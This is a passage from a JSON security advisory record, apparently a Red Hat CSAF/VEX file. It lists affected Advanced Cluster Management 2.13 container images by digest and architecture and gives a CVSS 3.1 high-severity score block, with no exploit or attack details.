"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:faeaa0d157334dcf9a808ea8916272c9912726580dc0ca06b6e3bb85860772ab_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:2bc6310bd61774d74b1dd0245139b3bfc4940efb1bf424ad0e7a4d822f2271b8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:95baf4ac24b7c9d2fb2883cdf81c7d75f76c8c53aef6745eb732918718877cd4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c17ac85849d3cdf437d09d8ce9581b48a73304498a315db470ec655fdb88f529_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f6dcad139d0a85137a293dd7cf8c68819658d71a1a45914030cfb7d58dac146d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:1ef6867542269af4ce8cee7225dfb4e64680715a1bb34ed510b9fbf84d88fb2d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:58a418395bf71e339145d259b6906172fbc066e17e05071ce983c5615e703075_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:81f72d7522fcc4a0e948e52987671328dcbfd726b54125a23d893cd45e6cbdd5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:f4ad6f2ed37be694b95b1c00b32f797cc29a0dab790207a254b4d4f4f2aa7158_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:723dd5b7b166ed9fcedd2f6b2b2567e943ffcfa78bfe7974ac410d629495bc27_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:7f20f9bb4a9b57b618fd864fd49ef0b1a1cb81d20668ba9f1bb2392086d7a144_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b3b5013c3333ed731561416060e14930f276336fb23037c6a7109496faee095e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ccc5e9181f23112628ee91c9acc577627a501af9bb170b2bf0eb0837811e7328_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:0bd1b50f01e6228c56cf07c005ac8ead15d814b09813157b79fcea9292e42551_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:82107bc3ac83308ba96111cc5690a23d116bcd71c7a65face89e4d530b2e8382_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a673e83cb652160fc3db1b69505d21a634a15fcc68f3940bda25f64dc0ae7bb6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/console-rhel9@sha256:a765f440d03be4c90a764f6ec1a2bf2d4c4acb0f8af630aff9811aaa631327ca_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:e8b775e29dbba36821b79231e35017cefd5bb6d245dd1c2d8004150c4998a89c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eaa602fc272af9fce6ea4b2b2e700e24fc29b7fcaad3437abc73f247a5f994aa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:ef6cd34e8f03c566dea492474495c0142a506b973b1a1ae00667de2993c88209_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:fbf35da688ccf2c7049320cee23dcbc518d2787d52c78574ff44e481a38ec20f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:38a4caea83181ce3f04956654ed3e2241a4563718a66ddf09eb0997afe47e0ce_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:54d57a40c0ebc2b7922552aff95b6219c10c4f1b27627d36bc800c1db33a4651_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:8fb71c30e1217f0697c872db2bafbb5e06a7f727c6b508f269512447d6b5118d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:e58abdba80628700eaf2736cb65e6746d2b2126cc7b19ba403c19be5e8a22509_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:83bc597e83bd0756afa67adcbd50858b0d1c23f87b572706e9059dd26055b4a0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:a5ccbff1ad0a3001902044e52590ee18508632bce7822ebf54ba521eaae180eb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:db8ed91f54d683d9d3be3b0747f7429eb95accc8802593dd61d8c24e8a1facfb_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:f3d2daf907e6fd32654d1458c60b134f4d938a933e53161e588bcd94ff6b01df_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:0aa9df5f5bf523f7d6d4a9e931a1932e62056d942bf86396d33874adc85a91e8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:4d0252b36a0ca8f522e60e400463b22de506766bdf0c1f65e3e289a3c93002d1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:701bc2dd0a441216ea138b677dbf71d497d9b7acaad5f48661117008a8e5defe_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:b30887b0c8fb4292b6c87ef681761c18a112e0113647e2bde86c04c13f59b7a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6b65f79a765b69a84ac5924280e9f6d55875b8aceb6ae97f9a75cb6076bd074a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6d410e7e4de91970f44368e5cc1ce1ac83908550785263342f6038a988be30e4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:736631a4d89bf44078b7f180ddcd474655d66ed43b85a4a79258eab9348656ff_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:ca58b27ea6673f0c506ed1ffad51918608a813dabf58f4845ab97d6e9f2c11d3_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:21f6d86d21be3a9541fc577a647d8f38b81bca975dc82d9506056f44e6a35443_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:60a3e7e83d189003d185e2415f96b4f3be0912e4cbaa96ea4ed8ebcdce5cc1d0_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:796abebd9573cacba87eb0c6497ed9617047eddba90f1c4b8237964ed954328d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:d130f2bb5b047483504d5c8113e0449983e79c49e8bda97b5752862930a91947_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:0a98f4d3e54b7410bfc1601f2ee2ba1308f30e40314bfc5169c3d99c3b8dfaa1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:3148a9662d732bbad15d6bd89cce43a886cba68ba1cefcef55f7bb65d3159432_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33c37b7bd401cfcf46d5cb42173fe3697a0649dc1080255dbd6243d4bfe8d08f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:cf1c1c1c778cafe6067df490969aab89a6b3e43487d954bb24b1409bc22f1091_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:118fe4fc31cb7818cda240c48628e5a3d43002c271fa7ba45d9631b7a6ddb8e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a2e5353298e0b0e46516d5127d0da65fcb5ac4498651693f347de1eb18e12095_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b10f9f52f0665ae2a8bb4bf2649aa6e3d1185a0dffb9ebeb11a8900174df5ef2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:c2bfb459d7442878d591cc31436830b983fe30dcfa6f7d383cc91cb32e42fa7c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:55320965b17fef48e776d39c548f0bf81a1e9239ee4b90a032f4b111e8748d2f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:a36bcef862d0e3cc972c9eb2c0d80311030659c13de6acab7e353905ff5eccff_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:c7bfe530a7efe66f5c3e2e08b114b3b9e44072e3609725663d6a5f3945bda512_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:e73d91e157c13ea96615fc060f5312997203f6b6350d335917b2feacb96c9ca5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2003587575e18b2e6b9bf3617c65e0f83ebc8cf30daf6dd241500cd1555820e0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:6098254a7e2fdd67ef1773abda74d3dde3d31e59254f4a1cd5e77dc34d224602_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:7fa35da009ab6e41177f0589f6d3fbf1bbe3fff4b52add3bfbc516a046e35640_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:9418993b725bf813959ed5adbd21690ee2cbeeac3d56c7ab6805c3eb29b5d46f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:14fb16412dea57a775e95954c3a07a77de846f851935629bf9bfdbcc46a70f4f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:40f8ad6430cc767b56992722d5890f98882c7372950320d28e808c18714b7179_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:c227f25ae401af3eba9352765f906c8b873370485a7c748b1602e53c0776f90f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:ffb3e3cd6764e802b5e9f87034548f96dcacfeedd8fe2b3b21b06c41734e8320_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:24df1e0d7850220df3aa658c6056f81a68fe451ffd99e4d0dfee07cebe9c3782_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:25fb42a78847235c61e35f66a6e02dfee5fc0b6832aa4ce06c3c6f395b95b36d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9e19fc6fd3285c1833cd97eeef10cb179fe9705dea9b3f912052207b3a2daea7_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:edc8b960038279c012c5aa99917361ad0888b0195c3ee9adb368b798a5bea2fb_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:231caddbaa1b499fae4efbf34c839941e595f242d12e22378e210b47de6262a8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:450199903a5d88d10b107768839780fbd0ee15535c6a998a0cac5bec942dd414_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:7fe0726987e478ed3da6d9b1eb4b611461e285ada827de6a186b95bc75a36c73_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:8d8eb1e5a21a37f041f60fbd624c7861f2e726997c6ad1d5279f59a7c849f2af_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1628ce0aab57c09dad7f5b2a24bf664de71b76a38cd05ccf281bb8cc8fc5859e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e3f01077df87eb91ece7c2bd6cfa2c15a0044c2f9c40efee9ce1bf14a6807b6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9bc74577f0edc3045a1a027c0f8652cc904fc3b9397dc9af10576f9dfcab2080_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:e9cab985b52c8f23b62cad3ea9c692e321a5347bd06fc56b19dfdb1801030567_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:01778cb2a2b9771a03ed8c7feb5b94a23225f60f4e49263e71dccd017cfd1164_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:0e4525617200428a5510108b0a0845fde43fd4e64804186af045df9680ca05b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:903c920eb068fcabdd16fb95f78902107892efa8e8a1ddda124d7f6bc1afdcd8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:ac486bf6a84c573a9774aadd4ea995a551c0abcbfb42dbbb71dc03e6c900a211_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:61b112b8ebb2ca4e41f5ee4b0c09ad0b53c3a6b60297fb8c1f158c28a8f10b3d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:6bd79f2c4c516adc626c73dec28892cbeab65e349dff8f1fcb11d7242b614805_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:c920a77dcf02347d116035d5cfef1a365e02022713788a14045a9be2a1bd1c5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:eb7788d29142ad36cba099b1dcebe3eb1c28366f87f611ca4d0b375bc7f4b19d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5b7668d6f3b7fb994c4bbbb86bdb92d4258b88ab92337394b66058255c048ad8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:64930ec82f003294eaf26f6ac59c493e1bfc8c3d7addeb4c5b8f0cfcf458c406_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:753415fcdcc9f6b8685a54d83f4d35d1104d690215125a36d6df2b9873ac6cd3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:c58049e17034c0df635df55fce49cab392af3194f57c03bbb842d7c2acb247e5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0907a51a72f39393da4bdee241333b08b5b5591f1e9a5de7d67ad586d11da59b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:498cdf1888c2ef9f031baafc288323ebd0fe5d9b009cedb1443605cf4153c0c0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5ac47e52a78f31b8982de5b9144ec96baab80c78ba8d06d3efabda329e017d36_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:9819517abcb75b516ea0e158ad9cbb0a4ef847f7858531b751c04de5a53527be_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:2ae0730de393d5aeff08a9317fc70459421dd8d6fc7a65f2a9e4a28ae5b64d9d_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:62c7b78b2726fd940db4bd435b13f6d07097395b069130b32ea0912c95333555_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8c986374ff8afd980f450877facc2927fdd6f655f3d6b7def6771485d00afeb1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:8eeb6a344b773bdc4f50da36c956dbaa50d6474f5c045e92250274d0ed723b39_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:1d7f37fa0146f48291fd1dd12752d0a19c8e87c30e1698492b36274c79051a9e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:5c3cc196a8638f6fae7c246ff6746f2f453bbfab8e018683ee297609713664ac_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:e539ec4ab10e81c08d68991e3c77efd43497f4a5561ee1315ff8d467736d245a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:fbc20e8545d4562d05df98d5cfbc91a7a2d802a9d4ff8c0ea733126687c42c26_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:111bbc8fda153d16c384a622dd659c53b8cdc47e495a9fada411a5042954ab6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:433f0b3d09889613d5214ba1c084bdc99bdcbce227fefd10b0d8491442698ea9_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:51096baed7d6ed403d88ac2dd935a30313f618b7552fee2b07367db5069601d1_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:b3eefeffd90660b8e463f2b06dc5ee2b46e235efae7c13ed893828a6c9598459_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:58a8acff99aaaacdb7c292b615c2ed9a0418d82f75273c1809a6db05811713fa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:661a4a1fb71f36ac1663232ca6e098d1c101dc16168eec7eee471ae11f98f66c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bc06192ce81eac533cb7c080e8aef6587991534cb9b1787537c49753c0985e3d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:e8207895ec9e7006746043cf04fbf1e2897aa30e74b9184665be2ac50f9fe650_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:3074a430dd8bbb0399ce649186cb6140d8525e5b7c1e05b79a4ab74a32d989b8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:34de933b36ee01444cdf4d4a45e47466ef8dad6ab6345134524595c191928ffe_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:8a65d646180c7889d0ba1e3a11fd6796d0020301e4e721575f87585afd8f9dfe_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:cf1b6cae5a10aec88554e71be094737b0a17efb07cd1175ca55f1799626f58f2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:036ee3882d4d6536c309d9aacea3dc611785deba3bd998092adcb1ba21664897_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:82914e82513e2f8522589886a5df6681d12c6442ff1b8ef05a21d31c09fa0f0d_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:893831b7270214137b2fdf1e55f0175b4ef6de9b8763eaaf0e0a935c8ab1744d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d6e329af2d9c1648006e3fa0b0232562a2bed6e7a33c56e025517f7d9068b5cc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:131918c9878d040c3ec190a9c724a65dbf3bb27f55a0fcac250d92067dc69288_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:327af8db145b9bd6ada1c9f27faa493ce090af412c51dedd7b247e65dcad51fc_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:721ebc57b91b4f9bcfb25d7b29ee8a2ca60fcb231096af2812f9201778e3ca51_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:ebff3dd368f33d1aec215b947b88f4aa7e821db1577d448b8c6eb4e6ead7fe07_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:6a88ce891e0fc9619e983a5b63fef86f735b8df5eb56909075bd3bbb098dddf8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:7485348cced991c7a4399e21e077ed62b3a118b7093bd4f42f9863d9e0da5c26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:b8d70910405eec4d886b27fc348a982c0b6f906f7f0e65aceecffd9f09fd6602_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/thanos-rhel9@sha256:e63891386bfb191cd0e74884cad1f86c462d57e51b9aeec7d9c5073ba4d723f9_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:01382838a23f75a6c03b30c68e9e42d72c22d773a4891260c639f7c8b60ffd87_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:1c74aaa66b6be9f5eb1f55851f1cc3f2a3878882c3fc972cd24232e9022f74e2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:696d1f7c4b5415e49760f7a66368aa0260284b12b108d5feb560838a9bce8a6f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7328602aa637f1b555ecd56c05d6ade8dbee48fae78a0118b1e39774b8383704_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:3ae25beb920ec77de14769895f60da6a3d83fc41192ca5da5f976076853e5a50_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:c9bf774dfa3f5a66339a86f22961c54b2b41199efd173b016a2c7c57407dae40_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:d1cac9d50ec20e770ae41aa8f90474c269d80e84a9990e2c3e613a892b0c044c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:ddb5d8c476bcc9b6d4a7c0d116a2f5150acbfa80cc890d77d5d90bd496a7860e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:0ffd5a902860aad15377e20b1e6481e6cf746fa3e33509df0f88f93f9a9f8034_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:abcf4d6f42dec254d8b4197282fb449daf13d4724ed23ddc2aafde0328338f74_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b6ea1f6389ad207c45321ab5a36c03949986e74ef9dbf5e3d2fdb2ceb5c4a602_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:e126327d69e48f2844f5beafc34514d31e9f3eed0ac393399edf80cf31a2eabe_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:0f7b1ee143f154e6e33c452f95fd0a0afb7fd020e758a991d18abde990e49e0c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.13:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:6363dfb96f394aef2b07b3a36c85d3af60dc3594ab615327176ba520704a4356_amd64",
